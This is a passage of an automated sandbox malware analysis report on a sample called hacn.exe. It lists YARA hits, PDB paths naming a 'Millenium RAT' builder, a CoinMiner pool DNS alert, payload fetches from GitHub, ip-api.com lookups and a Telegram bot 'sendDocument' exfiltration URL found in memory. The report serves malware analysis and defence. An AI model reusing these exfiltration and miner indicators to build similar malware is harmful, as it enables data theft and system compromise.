Source: Yara match	File source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49759 version: TLS 1.2

Source: hacn.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: s.exe, 00000004.00000000.1661323675.0000000000113000.00000002.00000001.01000000.00000006.sdmp, s.exe, 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000000.00000003.1643673285.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp

Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF61D337F4C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF61D337F4C
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D341FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF61D341FE4
Source: C:\Users\user\Desktop\hacn.exe	Code function: 0_2_00007FF61D328B00 FindFirstFileExW,FindClose,	0_2_00007FF61D328B00
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_000EA69B
Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe	Code function: 4_2_000FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_000FC220
Source: C:\ProgramData\main.exe	Code function: 5_2_00007FFDF7CB1DB0 FindFirstFileExA,	5_2_00007FFDF7CB1DB0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC64DCE0 FindFirstFileExW,	22_2_00000225DC64DCE0
Source: C:\Windows\System32\winlogon.exe	Code function: 22_2_00000225DC6ADCE0 FindFirstFileExW,	22_2_00000225DC6ADCE0
Source: C:\Windows\System32\lsass.exe	Code function: 26_2_00000202C0AEDCE0 FindFirstFileExW,	26_2_00000202C0AEDCE0
Source: C:\Windows\System32\svchost.exe	Code function: 29_2_000002A66130DCE0 FindFirstFileExW,	29_2_000002A66130DCE0
Source: C:\Windows\System32\dwm.exe	Code function: 30_2_000002BAAF02DCE0 FindFirstFileExW,	30_2_000002BAAF02DCE0
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_0000026A879CDCE0 FindFirstFileExW,	51_2_0000026A879CDCE0

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:63417 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox View	IP Address: 142.202.242.43 142.202.242.43

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hacn.exe, 00000000.00000003.1645313716.0000021BE6A21000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1646609171.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1645313716.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: main.exe, 00000005.00000002.1775219173.00000244324E6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://api.telegram.org/file/bot
Source: hacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663621476.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663803211.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663944148.000001E4E452B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 